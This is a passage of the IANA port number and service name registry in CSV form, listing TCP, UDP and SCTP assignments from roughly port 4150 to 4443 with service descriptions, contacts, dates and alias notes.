PowerAlert-nsa,4150,udp,PowerAlert Network Shutdown Agent,[Mike_Delgrosso_2],[Mike_Delgrosso_2],2007-07-02,,,,, menandmice-noh,4151,tcp,"Men & Mice Remote Control IANA assigned this well-formed service name as a replacement for ""menandmice_noh"".",[Eggert_Thorlacius],[Eggert_Thorlacius],2007-08-30,,,,, menandmice_noh,4151,tcp,Men & Mice Remote Control,[Eggert_Thorlacius],[Eggert_Thorlacius],2007-08-30,,,,,"This entry is an alias to ""menandmice-noh"". This entry is now historic, not usable for use with many common service discovery mechanisms." menandmice-noh,4151,udp,"Men & Mice Remote Control IANA assigned this well-formed service name as a replacement for ""menandmice_noh"".",[Eggert_Thorlacius],[Eggert_Thorlacius],2007-08-30,,,,, menandmice_noh,4151,udp,Men & Mice Remote Control,[Eggert_Thorlacius],[Eggert_Thorlacius],2007-08-30,,,,,"This entry is an alias to ""menandmice-noh"". This entry is now historic, not usable for use with many common service discovery mechanisms." idig-mux,4152,tcp,"iDigTech Multiplex IANA assigned this well-formed service name as a replacement for ""idig_mux"".",[Robin_Findley],[Robin_Findley],2007-05,,,,, idig_mux,4152,tcp,iDigTech Multiplex,[Robin_Findley],[Robin_Findley],2007-05,,,,,"This entry is an alias to ""idig-mux"". This entry is now historic, not usable for use with many common service discovery mechanisms." idig-mux,4152,udp,"iDigTech Multiplex IANA assigned this well-formed service name as a replacement for ""idig_mux"".",[Robin_Findley],[Robin_Findley],2007-05,,,,, idig_mux,4152,udp,iDigTech Multiplex,[Robin_Findley],[Robin_Findley],2007-05,,,,,"This entry is an alias to ""idig-mux"". This entry is now historic, not usable for use with many common service discovery mechanisms." mbl-battd,4153,tcp,MBL Remote Battery Monitoring,[Claudio_Procida],[Claudio_Procida],2007-05,,,,, mbl-battd,4153,udp,MBL Remote Battery Monitoring,[Claudio_Procida],[Claudio_Procida],2007-05,,,,, atlinks,4154,tcp,atlinks device discovery,[Scott_Griepentrog],[Scott_Griepentrog],2002-10,,,,, atlinks,4154,udp,atlinks device discovery,[Scott_Griepentrog],[Scott_Griepentrog],2002-10,,,,, bzr,4155,tcp,Bazaar version control system,[Martin_Pool_2],[Martin_Pool_2],2007-02,,,,, bzr,4155,udp,Bazaar version control system,[Martin_Pool_2],[Martin_Pool_2],2007-02,,,,, stat-results,4156,tcp,STAT Results,,,,,,,, stat-results,4156,udp,STAT Results,,,,,,,, stat-scanner,4157,tcp,STAT Scanner Control,,,,,,,, stat-scanner,4157,udp,STAT Scanner Control,,,,,,,, stat-cc,4158,tcp,STAT Command Center,[Darwin_Ammala],[Darwin_Ammala],2007-03,,,,, stat-cc,4158,udp,STAT Command Center,[Darwin_Ammala],[Darwin_Ammala],2007-03,,,,, nss,4159,tcp,Network Security Service,[Dave_Wierbowski],[Dave_Wierbowski],2006-08,,,,, nss,4159,udp,Network Security Service,[Dave_Wierbowski],[Dave_Wierbowski],2006-08,,,,, jini-discovery,4160,tcp,Jini Discovery,[Mark_Hodapp],[Mark_Hodapp],,,,,, jini-discovery,4160,udp,Jini Discovery,[Mark_Hodapp],[Mark_Hodapp],,,,,, omscontact,4161,tcp,OMS Contact,,,,,,,, omscontact,4161,udp,OMS Contact,,,,,,,, omstopology,4162,tcp,OMS Topology,[David_Page],[David_Page],2005-08,,,,, omstopology,4162,udp,OMS Topology,[David_Page],[David_Page],2005-08,,,,, silverpeakpeer,4163,tcp,Silver Peak Peer Protocol,[Damon_Ennis],[Damon_Ennis],2007-03,,,,, silverpeakpeer,4163,udp,Silver Peak Peer Protocol,[Damon_Ennis],[Damon_Ennis],2007-03,,,,, silverpeakcomm,4164,tcp,Silver Peak Communication Protocol,[Damon_Ennis],[Damon_Ennis],2007-03,,,,, silverpeakcomm,4164,udp,Silver Peak Communication Protocol,[Damon_Ennis],[Damon_Ennis],2007-03,,,,, altcp,4165,tcp,ArcLink over Ethernet,[Dmitry_Brant],[Dmitry_Brant],2007-03,,,,, altcp,4165,udp,ArcLink over Ethernet,[Dmitry_Brant],[Dmitry_Brant],2007-03,,,,, joost,4166,tcp,Joost Peer to Peer Protocol,[Colm_MacCarthaigh],[Colm_MacCarthaigh],2007-04,,,,, joost,4166,udp,Joost Peer to Peer Protocol,[Colm_MacCarthaigh],[Colm_MacCarthaigh],2007-04,,,,, ddgn,4167,tcp,DeskDirect Global Network,[Laurie_Charlwood],[Laurie_Charlwood],2007-08-22,,,,, ddgn,4167,udp,DeskDirect Global Network,[Laurie_Charlwood],[Laurie_Charlwood],2007-08-22,,,,, pslicser,4168,tcp,PrintSoft License Server,[David_Weisgerber],[David_Weisgerber],2007-09-27,,,,, pslicser,4168,udp,PrintSoft License Server,[David_Weisgerber],[David_Weisgerber],2007-09-27,,,,, iadt,4169,tcp,Automation Drive Interface Transport,[Paul_Suhler],[Paul_Suhler],2008-02-15,,,,, iadt-disc,4169,udp,Internet ADT Discovery Protocol,[Paul_A_Suhler],[Paul_A_Suhler],2009-02-06,,,,, d-cinema-csp,4170,tcp,SMPTE Content Synchonization Protocol,[Michael_Karagosian],[Michael_Karagosian],2008-09-04,,,,, ,4170,udp,Reserved,,,,,,,, ml-svnet,4171,tcp,Maxlogic Supervisor Communication,[Taha_Paksu],[Taha_Paksu],2009-12-21,,,,, ,4171,udp,Reserved,,,,,,,, pcoip,4172,tcp,PC over IP,[Teradici],[Jeff_Dillabough],2009-12-23,2012-03-06,,,, pcoip,4172,udp,PC over IP,[Teradici],[Jeff_Dillabough],2009-12-23,2012-03-06,,,, ,4173,tcp,Reserved,,,,,,,, mma-discovery,4173,udp,MMA Device Discovery,[MIDI_Manufacturers_Assoc_Inc],[Tom_White],2011-11-14,,,,, smcluster,4174,tcp,StorMagic Cluster Services,[Chris_Farey],[Chris_Farey],2011-03-09,,,,, sm-disc,4174,udp,StorMagic Discovery,[StorMagic_Ltd],[Chris_Farey],2011-12-16,,,,, bccp,4175,tcp,Brocade Cluster Communication Protocol,[Norival_Figueira],[Norival_Figueira],2010-04-07,,,,, ,4175,udp,Reserved,,,,,,,, tl-ipcproxy,4176,tcp,Translattice Cluster IPC Proxy,[Michael_Lyle],[Michael_Lyle],2009-11-03,,,,, ,4176,udp,Reserved,,,,,,,, wello,4177,tcp,Wello P2P pubsub service,[Christian_Westbrook],[Christian_Westbrook],2007-11-15,,,,, wello,4177,udp,Wello P2P pubsub service,[Christian_Westbrook],[Christian_Westbrook],2007-11-15,,,,, storman,4178,tcp,StorMan,[Werner_Guertler],[Werner_Guertler],2009-05-11,,,,, storman,4178,udp,StorMan,[Werner_Guertler],[Werner_Guertler],2009-05-11,,,,, MaxumSP,4179,tcp,Maxum Services,[Greg_Stine],[Greg_Stine],2007-07-05,,,,, MaxumSP,4179,udp,Maxum Services,[Greg_Stine],[Greg_Stine],2007-07-05,,,,, httpx,4180,tcp,HTTPX,[Paul_McGough],[Paul_McGough],2007-02,,,,, httpx,4180,udp,HTTPX,[Paul_McGough],[Paul_McGough],2007-02,,,,, macbak,4181,tcp,MacBak,[Wes_Peters],[Wes_Peters],2007-04,,,,, macbak,4181,udp,MacBak,[Wes_Peters],[Wes_Peters],2007-04,,,,, pcptcpservice,4182,tcp,Production Company Pro TCP Service,[Ben_McNeill],[Ben_McNeill],2007-05,,,,, pcptcpservice,4182,udp,Production Company Pro TCP Service,[Ben_McNeill],[Ben_McNeill],2007-05,,,,, gmmp,4183,tcp,General Metaverse Messaging Protocol,[Gareth_Nelson],[Gareth_Nelson],2007-06,,,,, gmmp,4183,udp,General Metaverse Messaging Protocol,[Gareth_Nelson],[Gareth_Nelson],2007-06,,,,, universe-suite,4184,tcp,"UNIVERSE SUITE MESSAGE SERVICE IANA assigned this well-formed service name as a replacement for ""universe_suite"".",[Gary_ANDREWS],[Gary_ANDREWS],2008-01-07,,,,, universe_suite,4184,tcp,UNIVERSE SUITE MESSAGE SERVICE,[Gary_ANDREWS],[Gary_ANDREWS],2008-01-07,,,,,"This entry is an alias to ""universe-suite"". This entry is now historic, not usable for use with many common service discovery mechanisms." universe-suite,4184,udp,"UNIVERSE SUITE MESSAGE SERVICE IANA assigned this well-formed service name as a replacement for ""universe_suite"".",[Gary_ANDREWS],[Gary_ANDREWS],2008-01-07,,,,, universe_suite,4184,udp,UNIVERSE SUITE MESSAGE SERVICE,[Gary_ANDREWS],[Gary_ANDREWS],2008-01-07,,,,,"This entry is an alias to ""universe-suite"". This entry is now historic, not usable for use with many common service discovery mechanisms." wcpp,4185,tcp,Woven Control Plane Protocol,[Christopher_LILJENST],[Christopher_LILJENST],2008-04-14,,,,, wcpp,4185,udp,Woven Control Plane Protocol,[Christopher_LILJENST],[Christopher_LILJENST],2008-04-14,,,,, boxbackupstore,4186,tcp,Box Backup Store Service,[Chris_Wilson],[Chris_Wilson],2008-09-11,,,,, ,4186,udp,Reserved,,,,,,,, csc-proxy,4187,tcp,"Cascade Proxy IANA assigned this well-formed service name as a replacement for ""csc_proxy"".",[Matt_Craighead],[Matt_Craighead],2008-09-11,,,,, csc_proxy,4187,tcp,Cascade Proxy,[Matt_Craighead],[Matt_Craighead],2008-09-11,,,,,"This entry is an alias to ""csc-proxy"". This entry is now historic, not usable for use with many common service discovery mechanisms." ,4187,udp,Reserved,,,,,,,, vatata,4188,tcp,Vatata Peer to Peer Protocol,[Song_Jian],[Song_Jian],2008-09-15,,,,, vatata,4188,udp,Vatata Peer to Peer Protocol,[Song_Jian],[Song_Jian],2008-09-15,,,,, pcep,4189,tcp,Path Computation Element Communication Protocol,,,,,,,, ,4189,udp,Reserved,,,,,[RFC5440],,, sieve,4190,tcp,ManageSieve Protocol,,,,,,,, ,4190,udp,Reserved,,,,,[RFC5804],,, ,4191,tcp,Reserved,,,,,,,, dsmipv6,4191,udp,Dual Stack MIPv6 NAT Traversal,,,,,[RFC5555],,, azeti,4192,tcp,Azeti Agent Service,[Uwe_Holz],[Uwe_Holz],2009-11-09,,,,, azeti-bd,4192,udp,azeti blinddate,[Michael_Werski],[Michael_Werski],2010-02-18,,,,, pvxplusio,4193,tcp,PxPlus remote file srvr,[Mike_King],[Mike_King],2009-11-09,,,,, ,4193,udp,Reserved,,,,,,,, ,4194-4198,,Unassigned,,,,,,,, eims-admin,4199,tcp,EIMS ADMIN,[Glenn_Anderson],[Glenn_Anderson],,,,,, eims-admin,4199,udp,EIMS ADMIN,[Glenn_Anderson],[Glenn_Anderson],,,,,, vrml-multi-use,4200-4299,,VRML Multi User Systems,[Mitra],[Mitra],,,,,, corelccam,4300,tcp,Corel CCam,[Jason_Aiken],[Jason_Aiken],,,,,, corelccam,4300,udp,Corel CCam,[Jason_Aiken],[Jason_Aiken],,,,,, d-data,4301,tcp,Diagnostic Data,,,,,,,, d-data,4301,udp,Diagnostic Data,,,,,,,, d-data-control,4302,tcp,Diagnostic Data Control,[Jon_March],[Jon_March],2006-09,,,,, d-data-control,4302,udp,Diagnostic Data Control,[Jon_March],[Jon_March],2006-09,,,,, srcp,4303,tcp,Simple Railroad Command Protocol,[Matthias_Trute],[Matthias_Trute],2007-01,,,,, srcp,4303,udp,Simple Railroad Command Protocol,[Matthias_Trute],[Matthias_Trute],2007-01,,,,, owserver,4304,tcp,One-Wire Filesystem Server,[Paul_Alfille],[Paul_Alfille],2007-01,,,,,Defined TXT keys: txtvers owserver,4304,udp,One-Wire Filesystem Server,[Paul_Alfille],[Paul_Alfille],2007-01,,,,,Defined TXT keys: txtvers batman,4305,tcp,better approach to mobile ad-hoc networking,[Simon_Wunderlich],[Simon_Wunderlich],2007-08-30,,,,, batman,4305,udp,better approach to mobile ad-hoc networking,[Simon_Wunderlich],[Simon_Wunderlich],2007-08-30,,,,, pinghgl,4306,tcp,Hellgate London,[David_Berk],[David_Berk],2007-08-30,,,,, pinghgl,4306,udp,Hellgate London,[David_Berk],[David_Berk],2007-08-30,,,,, visicron-vs,4307,tcp,Visicron Videoconference Service,[Alexey_Vlaskin],[Alexey_Vlaskin],2007-10-22,,,,, visicron-vs,4307,udp,Visicron Videoconference Service,[Alexey_Vlaskin],[Alexey_Vlaskin],2007-10-22,,,,, compx-lockview,4308,tcp,CompX-LockView,[John_Payson],[John_Payson],2007-10-22,,,,, compx-lockview,4308,udp,CompX-LockView,[John_Payson],[John_Payson],2007-10-22,,,,, dserver,4309,tcp,Exsequi Appliance Discovery,[Angelo_Masci],[Angelo_Masci],2007-01,,,,, dserver,4309,udp,Exsequi Appliance Discovery,[Angelo_Masci],[Angelo_Masci],2007-01,,,,, mirrtex,4310,tcp,Mir-RT exchange service,[Sylvain_Robert],[Sylvain_Robert],2008-02-14,,,,, mirrtex,4310,udp,Mir-RT exchange service,[Sylvain_Robert],[Sylvain_Robert],2008-02-14,,,,, p6ssmc,4311,tcp,P6R Secure Server Management Console,[Jim_Susoy],[Jim_Susoy],2010-01-21,,,,, ,4311,udp,Reserved,,,,,,,, pscl-mgt,4312,tcp,Parascale Membership Manager,[John_Muth],[John_Muth],2010-01-21,,,,, ,4312,udp,Reserved,,,,,,,, perrla,4313,tcp,PERRLA User Services,[Cliff_Batson],[Cliff_Batson],2010-01-21,,,,, ,4313,udp,Reserved,,,,,,,, choiceview-agt,4314,tcp,ChoiceView Agent,[Radish_Systems],[Richard_A_Davis],2013-03-28,,,,, ,4314,udp,Reserved,,,,,,,, ,4315,,Unassigned,,,,,,,Unauthorized Use Known on port 4315, choiceview-clt,4316,tcp,ChoiceView Client,[Radish_Systems],[Richard_A_Davis],2013-03-28,,,,, ,4316,udp,Reserved,,,,,,,, ,4317-4319,,Unassigned,,,,,,,, fdt-rcatp,4320,tcp,FDT Remote Categorization Protocol,[Russell_P_Holsclaw],[Russell_P_Holsclaw],2006-03,,,,, fdt-rcatp,4320,udp,FDT Remote Categorization Protocol,[Russell_P_Holsclaw],[Russell_P_Holsclaw],2006-03,,,,, rwhois,4321,tcp,Remote Who Is,[Mark_Kosters],[Mark_Kosters],,,[RFC2167],,, rwhois,4321,udp,Remote Who Is,[Mark_Kosters],[Mark_Kosters],,,[RFC2167],,, trim-event,4322,tcp,TRIM Event Service,,,,,,,, trim-event,4322,udp,TRIM Event Service,,,,,,,, trim-ice,4323,tcp,TRIM ICE Service,[Siva_Poobalasingam_2],[Siva_Poobalasingam_2],2007-02,,,,, trim-ice,4323,udp,TRIM ICE Service,[Siva_Poobalasingam_2],[Siva_Poobalasingam_2],2007-02,,,,, balour,4324,tcp,Balour Game Server,[Konstantin_Schauweck],[Konstantin_Schauweck],2007-02,,,,, balour,4324,udp,Balour Game Server,[Konstantin_Schauweck],[Konstantin_Schauweck],2007-02,,,,, geognosisman,4325,tcp,Cadcorp GeognoSIS Manager Service,,,,,,,, geognosisman,4325,udp,Cadcorp GeognoSIS Manager Service,,,,,,,, geognosis,4326,tcp,Cadcorp GeognoSIS Service,[Martin_Daly],[Martin_Daly],2006-11,,,,, geognosis,4326,udp,Cadcorp GeognoSIS Service,[Martin_Daly],[Martin_Daly],2006-11,,,,, jaxer-web,4327,tcp,Jaxer Web Protocol,[Uri_Sarid],[Uri_Sarid],2008-01-07,,,,, jaxer-web,4327,udp,Jaxer Web Protocol,[Uri_Sarid],[Uri_Sarid],2008-01-07,,,,, jaxer-manager,4328,tcp,Jaxer Manager Command Protocol,[Uri_Sarid],[Uri_Sarid],2008-01-22,,,,, jaxer-manager,4328,udp,Jaxer Manager Command Protocol,[Uri_Sarid],[Uri_Sarid],2008-01-22,,,,, publiqare-sync,4329,tcp,PubliQare Distributed Environment Synchronisation Engine,[Tom_Maaswinkel],[Tom_Maaswinkel],2011-02-07,,,,, ,4329,udp,Reserved,,,,,,,, dey-sapi,4330,tcp,DEY Storage Administration REST API,[DEY_Storage_Systems_Inc],[Garrett_D_Amore],2013-03-01,,,,, ,4330,udp,Reserved,,,,,,,, ktickets-rest,4331,tcp,ktickets REST API for event management and ticketing systems (embedded POS devices),[KeyTicket_Solutions],[MANG_Ioan-Alexandru],2014-04-04,,,,, ,4331,udp,Reserved,,,,,,,, ,4332,,Unassigned,,,,,,,, ahsp,4333,tcp,ArrowHead Service Protocol (AHSP),[QuantuMatriX_Technologies],[Matthew_Schultz],2014-04-10,,,,, ahsp,4333,udp,ArrowHead Service Protocol (AHSP),[QuantuMatriX_Technologies],[Matthew_Schultz],2014-04-10,,,,, ahsp,4333,sctp,ArrowHead Service Protocol (AHSP),[QuantuMatriX_Technologies],[Matthew_Schultz],2014-04-10,,,,, ,4334-4339,,Unassigned,,,,,,,, gaia,4340,tcp,Gaia Connector Protocol,[Philippe_Detournay],[Philippe_Detournay],2007-11-12,,,,, gaia,4340,udp,Gaia Connector Protocol,[Philippe_Detournay],[Philippe_Detournay],2007-11-12,,,,, lisp-data,4341,tcp,LISP Data Packets,[Dino_Farinacci],[Dino_Farinacci],2007-11-12,,,,, lisp-data,4341,udp,LISP Data Packets,[IESG],[IETF_Chair],2007-11-12,2012-04-26,[RFC6830],,, lisp-cons,4342,tcp,LISP-CONS Control,,,,,,,, lisp-control,4342,udp,LISP Control Packets,[IESG],[IETF_Chair],2007-05,2012-04-26,[RFC6830],,, unicall,4343,tcp,UNICALL,[James_Powell_2],[James_Powell_2],,,,,, unicall,4343,udp,UNICALL,[James_Powell_2],[James_Powell_2],,,,,, vinainstall,4344,tcp,VinaInstall,[Jay_Slupesky],[Jay_Slupesky],,,,,, vinainstall,4344,udp,VinaInstall,[Jay_Slupesky],[Jay_Slupesky],,,,,, m4-network-as,4345,tcp,Macro 4 Network AS,[Paul_Wren],[Paul_Wren],,,,,, m4-network-as,4345,udp,Macro 4 Network AS,[Paul_Wren],[Paul_Wren],,,,,, elanlm,4346,tcp,ELAN LM,[Paul_Ballew],[Paul_Ballew],,,,,, elanlm,4346,udp,ELAN LM,[Paul_Ballew],[Paul_Ballew],,,,,, lansurveyor,4347,tcp,LAN Surveyor,[Michael_Swan],[Michael_Swan],,,,,, lansurveyor,4347,udp,LAN Surveyor,[Michael_Swan],[Michael_Swan],,,,,, itose,4348,tcp,ITOSE,[Michael_Haeuptle],[Michael_Haeuptle],,,,,, itose,4348,udp,ITOSE,[Michael_Haeuptle],[Michael_Haeuptle],,,,,, fsportmap,4349,tcp,File System Port Map,[Ron_Minnich_2],[Ron_Minnich_2],,,,,, fsportmap,4349,udp,File System Port Map,[Ron_Minnich_2],[Ron_Minnich_2],,,,,, net-device,4350,tcp,Net Device,[Glenn_Peterson],[Glenn_Peterson],,,,,, net-device,4350,udp,Net Device,[Glenn_Peterson],[Glenn_Peterson],,,,,, plcy-net-svcs,4351,tcp,PLCY Net Services,[J_J_Ekstrom],[J_J_Ekstrom],,,,,, plcy-net-svcs,4351,udp,PLCY Net Services,[J_J_Ekstrom],[J_J_Ekstrom],,,,,, pjlink,4352,tcp,Projector Link,[Mitsuo_Kodama],[Mitsuo_Kodama],2005-06,,,,, pjlink,4352,udp,Projector Link,[Mitsuo_Kodama],[Mitsuo_Kodama],2005-06,,,,, f5-iquery,4353,tcp,F5 iQuery,[Tom_Kee],[Tom_Kee],,,,,, f5-iquery,4353,udp,F5 iQuery,[Tom_Kee],[Tom_Kee],,,,,, qsnet-trans,4354,tcp,QSNet Transmitter,,,,,,,, qsnet-trans,4354,udp,QSNet Transmitter,,,,,,,, qsnet-workst,4355,tcp,QSNet Workstation,,,,,,,, qsnet-workst,4355,udp,QSNet Workstation,,,,,,,, qsnet-assist,4356,tcp,QSNet Assistant,,,,,,,, qsnet-assist,4356,udp,QSNet Assistant,,,,,,,, qsnet-cond,4357,tcp,QSNet Conductor,,,,,,,, qsnet-cond,4357,udp,QSNet Conductor,,,,,,,, qsnet-nucl,4358,tcp,QSNet Nucleus,[Neer_Kleinman],[Neer_Kleinman],,,,,, qsnet-nucl,4358,udp,QSNet Nucleus,[Neer_Kleinman],[Neer_Kleinman],,,,,, omabcastltkm,4359,tcp,OMA BCAST Long-Term Key Messages,[Frank_Hartung],[Frank_Hartung],2007-09-07,,,,, omabcastltkm,4359,udp,OMA BCAST Long-Term Key Messages,[Frank_Hartung],[Frank_Hartung],2007-09-07,,,,, matrix-vnet,4360,tcp,"Matrix VNet Communication Protocol IANA assigned this well-formed service name as a replacement for ""matrix_vnet"".",[Rehan_Mahmood],[Rehan_Mahmood],2009-03-18,,,,, matrix_vnet,4360,tcp,Matrix VNet Communication Protocol,[Rehan_Mahmood],[Rehan_Mahmood],2009-03-18,,,,,"This entry is an alias to ""matrix-vnet"". This entry is now historic, not usable for use with many common service discovery mechanisms." ,4360,udp,Reserved,,,,,,,, ,4361,tcp,Reserved,,,,,,,, nacnl,4361,udp,NavCom Discovery and Control Port,[Yilei_Jia],[Yilei_Jia],2009-03-18,,,,, ,4362,tcp,Reserved,,,,,,,, afore-vdp-disc,4362,udp,AFORE vNode Discovery protocol,[Michael_Richardson],[Michael_Richardson],2011-02-08,,,,, ,4363-4367,,Unassigned,,,,,,,, wxbrief,4368,tcp,WeatherBrief Direct,[Kim_Alan_Waggoner],[Kim_Alan_Waggoner],2006-11,,,,, wxbrief,4368,udp,WeatherBrief Direct,[Kim_Alan_Waggoner],[Kim_Alan_Waggoner],2006-11,,,,, epmd,4369,tcp,Erlang Port Mapper Daemon,[Erlang],[Erlang],,,,,, epmd,4369,udp,Erlang Port Mapper Daemon,[Erlang],[Erlang],,,,,, elpro-tunnel,4370,tcp,"ELPRO V2 Protocol Tunnel IANA assigned this well-formed service name as a replacement for ""elpro_tunnel"".",[Harry_Courtice],[Harry_Courtice],2008-04-14,,,,, elpro_tunnel,4370,tcp,ELPRO V2 Protocol Tunnel,[Harry_Courtice],[Harry_Courtice],2008-04-14,,,,,"This entry is an alias to ""elpro-tunnel"". This entry is now historic, not usable for use with many common service discovery mechanisms." elpro-tunnel,4370,udp,"ELPRO V2 Protocol Tunnel IANA assigned this well-formed service name as a replacement for ""elpro_tunnel"".",[Harry_Courtice],[Harry_Courtice],2008-04-14,,,,, elpro_tunnel,4370,udp,ELPRO V2 Protocol Tunnel,[Harry_Courtice],[Harry_Courtice],2008-04-14,,,,,"This entry is an alias to ""elpro-tunnel"". This entry is now historic, not usable for use with many common service discovery mechanisms." l2c-control,4371,tcp,LAN2CAN Control,[Phil_Tolson],[Phil_Tolson],2008-07-07,,,,,Modified: 21 January 2010 l2c-disc,4371,udp,LAN2CAN Discovery,[Phil_Tolson],[Phil_Tolson],2010-01-21,,,,, l2c-data,4372,tcp,LAN2CAN Data,[Phil_Tolson],[Phil_Tolson],2008-07-07,,,,,Modified: 21 January 2010 l2c-data,4372,udp,LAN2CAN Data,[Phil_Tolson],[Phil_Tolson],2010-01-21,,,,, remctl,4373,tcp,Remote Authenticated Command Service,[Russ_Allbery],[Russ_Allbery],2007-08-30,,,,, remctl,4373,udp,Remote Authenticated Command Service,[Russ_Allbery],[Russ_Allbery],2007-08-30,,,,, psi-ptt,4374,tcp,PSI Push-to-Talk Protocol,[Frank_B],[Frank_B],2008-07-17,,,,, ,4374,udp,Reserved,,,,,,,, tolteces,4375,tcp,Toltec EasyShare,[Joon_Radley_2],[Joon_Radley_2],2008-10-21,,,,, tolteces,4375,udp,Toltec EasyShare,[Joon_Radley_2],[Joon_Radley_2],2008-10-21,,,,, bip,4376,tcp,BioAPI Interworking,[Jean_Paul_Lemaire],[Jean_Paul_Lemaire],2007-07-05,,,,, bip,4376,udp,BioAPI Interworking,[Jean_Paul_Lemaire],[Jean_Paul_Lemaire],2007-07-05,,,,, cp-spxsvr,4377,tcp,Cambridge Pixel SPx Server,,,,,,,, cp-spxsvr,4377,udp,Cambridge Pixel SPx Server,,,,,,,, cp-spxdpy,4378,tcp,Cambridge Pixel SPx Display,[Richard_Warren],[Richard_Warren],2007-07-05,,,,, cp-spxdpy,4378,udp,Cambridge Pixel SPx Display,[Richard_Warren],[Richard_Warren],2007-07-05,,,,, ctdb,4379,tcp,CTDB,[Ronnie_Sahlberg],[Ronnie_Sahlberg],2007-07-05,,,,, ctdb,4379,udp,CTDB,[Ronnie_Sahlberg],[Ronnie_Sahlberg],2007-07-05,,,,, ,4380-4388,,Unassigned,,,,,,,, xandros-cms,4389,tcp,Xandros Community Management Service,[Stephen_M_Webb],[Stephen_M_Webb],2007-05,,,,, xandros-cms,4389,udp,Xandros Community Management Service,[Stephen_M_Webb],[Stephen_M_Webb],2007-05,,,,, wiegand,4390,tcp,Physical Access Control,[Scott_Guthery_2],[Scott_Guthery_2],2008-08-25,,,,, wiegand,4390,udp,Physical Access Control,[Scott_Guthery_2],[Scott_Guthery_2],2008-08-25,,,,, apwi-imserver,4391,tcp,American Printware IMServer Protocol,[Lech_Lakomy],[Lech_Lakomy],2009-02-12,,,,, ,4391,udp,Reserved,,,,,,,, apwi-rxserver,4392,tcp,American Printware RXServer Protocol,[Lech_Lakomy],[Lech_Lakomy],2009-02-12,,,,, ,4392,udp,Reserved,,,,,,,, apwi-rxspooler,4393,tcp,American Printware RXSpooler Protocol,[Lech_Lakomy],[Lech_Lakomy],2009-02-12,,,,, ,4393,udp,Reserved,,,,,,,, ,4394,tcp,Reserved,,,,,,,, apwi-disc,4394,udp,American Printware Discovery,[Lech_Lakomy],[Lech_Lakomy],2009-02-12,,,,, omnivisionesx,4395,tcp,OmniVision communication for Virtual environments,[Vacquier_Serge],[Vacquier_Serge],2009-02-12,,,,, omnivisionesx,4395,udp,OmniVision communication for Virtual environments,[Vacquier_Serge],[Vacquier_Serge],2009-02-12,,,,, fly,4396,tcp,Fly Object Space,[Nigel_Warren],[Nigel_Warren],2009-02-12,,,,, ,4396,udp,Reserved,,,,,,,, ,4397-4399,,Unassigned,,,,,,,, ds-srv,4400,tcp,ASIGRA Services,[David_Farajun],[David_Farajun],2004-11,,,,, ds-srv,4400,udp,ASIGRA Services,[David_Farajun],[David_Farajun],2004-11,,,,, ds-srvr,4401,tcp,ASIGRA Televaulting DS-System Service,,,,,,,, ds-srvr,4401,udp,ASIGRA Televaulting DS-System Service,,,,,,,, ds-clnt,4402,tcp,ASIGRA Televaulting DS-Client Service,,,,,,,, ds-clnt,4402,udp,ASIGRA Televaulting DS-Client Service,,,,,,,, ds-user,4403,tcp,ASIGRA Televaulting DS-Client Monitoring/Management,,,,,,,, ds-user,4403,udp,ASIGRA Televaulting DS-Client Monitoring/Management,,,,,,,, ds-admin,4404,tcp,ASIGRA Televaulting DS-System Monitoring/Management,,,,,,,, ds-admin,4404,udp,ASIGRA Televaulting DS-System Monitoring/Management,,,,,,,, ds-mail,4405,tcp,ASIGRA Televaulting Message Level Restore service,,,,,,,, ds-mail,4405,udp,ASIGRA Televaulting Message Level Restore service,,,,,,,, ds-slp,4406,tcp,ASIGRA Televaulting DS-Sleeper Service,[Andrei_Litvinn],[Andrei_Litvinn],2005-01,,,,, ds-slp,4406,udp,ASIGRA Televaulting DS-Sleeper Service,[Andrei_Litvinn],[Andrei_Litvinn],2005-01,,,,, nacagent,4407,tcp,Network Access Control Agent,[ITGroup],[ITGroup],2008-06-30,,,,, ,4407,udp,Reserved,,,,,,,, slscc,4408,tcp,SLS Technology Control Centre,[Steven_Sweeting],[Steven_Sweeting],2008-01-28,,,,, ,4408,udp,Reserved,,,,,,,, netcabinet-com,4409,tcp,Net-Cabinet comunication,[Ian_Manning_2],[Ian_Manning_2],2009-12-16,,,,, ,4409,udp,Reserved,,,,,,,, itwo-server,4410,tcp,RIB iTWO Application Server,[Kristean_Heisler_2],[Kristean_Heisler_2],2009-12-16,,,,, ,4410,udp,Reserved,,,,,,,, found,4411,tcp,Found Messaging Protocol,[Found_Software],[John_Mitchell],2012-04-11,,,,,"Defined TXT keys: id, key" ,4411,udp,Reserved,,,,,,,, ,4412-4424,,Unassigned,,,,,,,, netrockey6,4425,tcp,NetROCKEY6 SMART Plus Service,[Feitian_Technologies],[Feitian_Technologies],2010-09-15,,,,, netrockey6,4425,udp,NetROCKEY6 SMART Plus Service,[Feitian_Technologies],[Feitian_Technologies],2010-09-15,,,,, beacon-port-2,4426,tcp,SMARTS Beacon Port,[Eyal_Yardeni],[Eyal_Yardeni],2003-11,,,,, beacon-port-2,4426,udp,SMARTS Beacon Port,[Eyal_Yardeni],[Eyal_Yardeni],2003-11,,,,, drizzle,4427,tcp,Drizzle database server,[Elliot_Murphy],[Elliot_Murphy],2008-07-09,,,,, ,4427,udp,Reserved,,,,,,,, omviserver,4428,tcp,OMV-Investigation Server-Client,[Serge_Vacquier],[Serge_Vacquier],2009-05-20,,,,, ,4428,udp,Reserved,,,,,,,, omviagent,4429,tcp,OMV Investigation Agent-Server,[Serge_Vacquier],[Serge_Vacquier],2009-05-20,,,,, ,4429,udp,Reserved,,,,,,,, rsqlserver,4430,tcp,REAL SQL Server,[Marco_Bambini],[Marco_Bambini],2008-08-28,,,,, rsqlserver,4430,udp,REAL SQL Server,[Marco_Bambini],[Marco_Bambini],2008-08-28,,,,, wspipe,4431,tcp,adWISE Pipe,[Heikki_E],[Heikki_E],2009-06-18,,,,, ,4431,udp,Reserved,,,,,,,, l-acoustics,4432,tcp,L-ACOUSTICS management,[L-ACOUSTICS],[Christophe_Pignon],2012-08-13,,,,, l-acoustics,4432,udp,L-ACOUSTICS management,[L-ACOUSTICS],[Christophe_Pignon],2012-08-13,,,,, vop,4433,tcp,Versile Object Protocol,[Versile_AS],[Tore_Skaug],2012-02-01,,,,, ,4433,udp,Reserved,,,,,,,, ,4434-4440,,Unassigned,,,,,,,, ,4441,tcp,Reserved,,,,,,,, netblox,4441,udp,Netblox Protocol,[Brian_S_Locke],[Brian_S_Locke],2008-07-10,,,,, saris,4442,tcp,Saris,,,,,,,, saris,4442,udp,Saris,,,,,,,, pharos,4443,tcp,Pharos,[TeleConsult],[TeleConsult],,,,,Known Unauthorized Use on port 4443, pharos,4443,udp,Pharos,[TeleConsult],[TeleConsult],,,,,Known Unauthorized Use on port 4443, 